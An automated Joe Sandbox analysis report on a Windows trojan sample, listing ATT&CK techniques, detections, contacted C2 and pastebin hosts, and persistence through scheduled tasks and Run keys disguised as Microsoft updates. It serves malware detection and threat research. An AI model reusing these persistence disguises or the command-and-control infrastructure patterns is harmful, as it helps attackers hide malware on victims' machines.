Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	331 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	12 Process Injection	1 Obfuscated Files or Information	LSASS Memory	123 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	21 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Software Packing	Security Account Manager	441 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	3 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	251 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CVmkXJ7e0a.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
CVmkXJ7e0a.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	0%	Avira URL Cloud	safe
http://marketdedamoroza.we	0%	Avira URL Cloud	safe
http://marketdedamoroza.webhop.me/index.html	0%	Avira URL Cloud	safe
http://marketdedamoroza.webhop.me	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://marketdedamoroza.webhop.mep	0%	Avira URL Cloud	safe
https://pastebin.co	100%	Avira URL Cloud	malware
https://pastebin.comp	0%	Avira URL Cloud	safe
https://pastebin.c	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
marketdedamoroza.webhop.me	0.0.0.0	true	false	unknown
l-carlo.gl.at.ply.gg	147.185.221.22	true	true	unknown
pastebin.com	104.20.4.235	true	false	high
icanhazip.com	104.16.185.241	true	false	high
49.39.14.0.in-addr.arpa	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://icanhazip.com/	false		high
https://pastebin.com/raw/bCQ1bAxy	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://marketdedamoroza.webhop.mep	CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002C6D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	tmp818B.tmp.dat.0.dr, tmp7E9C.tmp.dat.0.dr, tmp81EA.tmp.dat.0.dr, tmp7714.tmp.dat.0.dr	false		high
https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow	tmp7C1B.tmp.dat.0.dr	false		high
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	tmp818B.tmp.dat.0.dr, tmp7E9C.tmp.dat.0.dr, tmp81EA.tmp.dat.0.dr, tmp7714.tmp.dat.0.dr	false		high
https://duckduckgo.com/ac/?q=	tmp7714.tmp.dat.0.dr	false		high
https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://pastebin.com/raw	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discordapp.com/api/v6/users/	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp, CVmkXJ7e0a.exe, 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_	tmp7C1B.tmp.dat.0.dr, Downloads.txt.0.dr	false		high
https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://pastebin.co	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000003E.00000002.2914742198.0000000002D47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/odirm	xdwdpnsvr.exe, 0000000F.00000002.2751034563.000000001BA07000.00000004.00000020.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/bCQ1bA	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.c	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000003E.00000002.2914742198.0000000002D47000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	tmp7E9C.tmp.dat.0.dr, tmp7714.tmp.dat.0.dr	false		high
https://pastebin.com/raw/bC	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://www.eicar.org/download-anti-malware-testfile/:	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012EE0000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp818B.tmp.dat.0.dr, tmp7E9C.tmp.dat.0.dr, tmp81EA.tmp.dat.0.dr, tmp7714.tmp.dat.0.dr	false		high
https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://secure.eicar.org/eicar.com;	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012EE0000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://pastebin.com/raw/bCQ1	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/bCQ	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/bCQ1bAx	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://secure.eicar.org/eicar.com.txtD	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://pastebin.comp	xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://icanhazip.com	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012BFB000.00000004.00000800.00020000.00000000.sdmp, CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002D4C000.00000004.00000800.00020000.00000000.sdmp, CVmkXJ7e0a.exe, 00000000.00000002.3684881452.000000001CF10000.00000004.08000000.00040000.00000000.sdmp	false		high
http://marketdedamoroza.webhop.me/index.html	CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002F3D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	CVmkXJ7e0a.exe, 00000000.00000002.3681814321.000000001BD20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002960000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.00000000035DE000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000003E.00000002.2914742198.0000000002D2B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packetstormsecurity.com/files/download/22459/BIOS320.EXE)	Downloads.txt.0.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmp818B.tmp.dat.0.dr, tmp81EA.tmp.dat.0.dr	false		high
https://secure.eicar.org/eicar.com	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012EC8000.00000004.00000800.00020000.00000000.sdmp, History.txt.0.dr, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmp7714.tmp.dat.0.dr	false		high
https://pastebin.com/r	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/b	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/download-anti-malware-testfile/)	Downloads.txt.0.dr	false		high
https://secure.eicar.org/eicar.com.txt/	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012EC8000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://www.ecosia.org/newtab/	tmp7E9C.tmp.dat.0.dr, tmp7714.tmp.dat.0.dr	false		high
https://www.google.com/search?q=eicar	tmp7C1B.tmp.dat.0.dr	false		high
http://marketdedamoroza.we	CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002F3D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.eicar.org/eicar.com/	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012EC8000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://pastebin.com/raw/bCQ1b	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmp7714.tmp.dat.0.dr	false		high
https://www.eicar.org/download-anti-malware-testfile/Download	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012EC8000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://www.eicar.org/download-anti-malware-testfile/	History.txt.0.dr	false		high
https://www.eicar.org/	eicar.com.txt_Zone.Identifier.0.dr	false		high
https://www.autoitscript.com/site/autoit/downloads/)	Downloads.txt.0.dr	false		high
https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.000000001385B000.00000004.00000800.00020000.00000000.sdmp, tmp79A8.tmp.dat.0.dr, tmp76E4.tmp.dat.0.dr	false		high
http://marketdedamoroza.webhop.me	CVmkXJ7e0a.exe, 00000000.00000002.3664308331.0000000002F3D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	CVmkXJ7e0a.exe, 00000000.00000002.3681814321.000000001BD20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://pastebin.com/raw/	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000013853000.00000004.00000800.00020000.00000000.sdmp, CVmkXJ7e0a.exe, 00000000.00000002.3672605336.000000001384B000.00000004.00000800.00020000.00000000.sdmp, tmp79A8.tmp.dat.0.dr, tmp76E4.tmp.dat.0.dr	false		high
https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.000000001385B000.00000004.00000800.00020000.00000000.sdmp, tmp79A8.tmp.dat.0.dr, tmp76E4.tmp.dat.0.dr	false		high
https://pastebin.com/	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/	CVmkXJ7e0a.exe, 00000000.00000002.3672605336.0000000012ED4000.00000004.00000800.00020000.00000000.sdmp, tmp79E7.tmp.dat.0.dr, tmp7C1B.tmp.dat.0.dr	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp7714.tmp.dat.0.dr	false		high
https://pastebin.com	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000003E.00000002.2914742198.0000000002D47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gemini.google.com/app?q=	tmp7714.tmp.dat.0.dr	false		high
https://pastebin.com/ra	xdwdpnsvr.exe, 0000000F.00000002.2744314834.0000000002F95000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 00000019.00000002.2821549881.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000020.00000002.2806267271.0000000002987000.00000004.00000800.00020000.00000000.sdmp, xdwdUpdate.exe, 0000002A.00000002.2895963175.0000000003607000.00000004.00000800.00020000.00000000.sdmp, xdwdpnsvr.exe, 00000034.00000002.2886914181.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.eicar.org/eicar.com.txt	tmp7C1B.tmp.dat.0.dr, eicar.com.txt_Zone.Identifier.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.4.235	pastebin.com	United States	13335	CLOUDFLARENETUS	false
147.185.221.22	l-carlo.gl.at.ply.gg	United States	12087	SALSGIVERUS	true
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574307
Start date and time:	2024-12-13 08:23:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	104
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	CVmkXJ7e0a.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@156/126@5/3
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Successful, ratio: 59% Number of executed functions: 422 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, WmiApSrv.exe, svchost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Execution Graph export aborted for target xdwdUpdate.exe, PID 5756 because it is empty
Execution Graph export aborted for target xdwdUpdate.exe, PID 6480 because it is empty
Execution Graph export aborted for target xdwdUpdate.exe, PID 8092 because it is empty
Execution Graph export aborted for target xdwdpnsvr.exe, PID 3084 because it is empty
Execution Graph export aborted for target xdwdpnsvr.exe, PID 5880 because it is empty
Execution Graph export aborted for target xdwdpnsvr.exe, PID 6008 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
VT rate limit hit for: CVmkXJ7e0a.exe

Simulations

Behavior and APIs

Time	Type	Description
02:25:07	API Interceptor	3646592x Sleep call for process: CVmkXJ7e0a.exe modified
02:25:33	API Interceptor	3x Sleep call for process: xdwdpnsvr.exe modified
02:25:39	API Interceptor	4x Sleep call for process: xdwdUpdate.exe modified
08:25:08	Task Scheduler	Run new task: Microsoft Skype path: C:\Users\Public\Pictures\xdwdUpdate.exe
08:25:31	Task Scheduler	Run new task: Microsoft Access Update path: C:\Users\user\AppData\Roaming\xdwdpnsvr.exe
08:25:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run chrome C:\Users\user\AppData\Roaming\xdwdpnsvr.exe
08:25:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run chrome C:\Users\user\AppData\Roaming\xdwdpnsvr.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.4.235	gabe.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	vF20HtY4a4.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	gaber.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	cr_asm_crypter.ps1	Get hash	malicious	Unknown	Browse	pastebin.com/raw/sA04Mwk2
	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
	sostener.vbs	Get hash	malicious	XWorm	Browse	pastebin.com/raw/V9y5Q5vv
	envifa.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
147.185.221.22	ozgpPwVAu1.exe	Get hash	malicious	XWorm	Browse
	exe003.exe	Get hash	malicious	XWorm	Browse
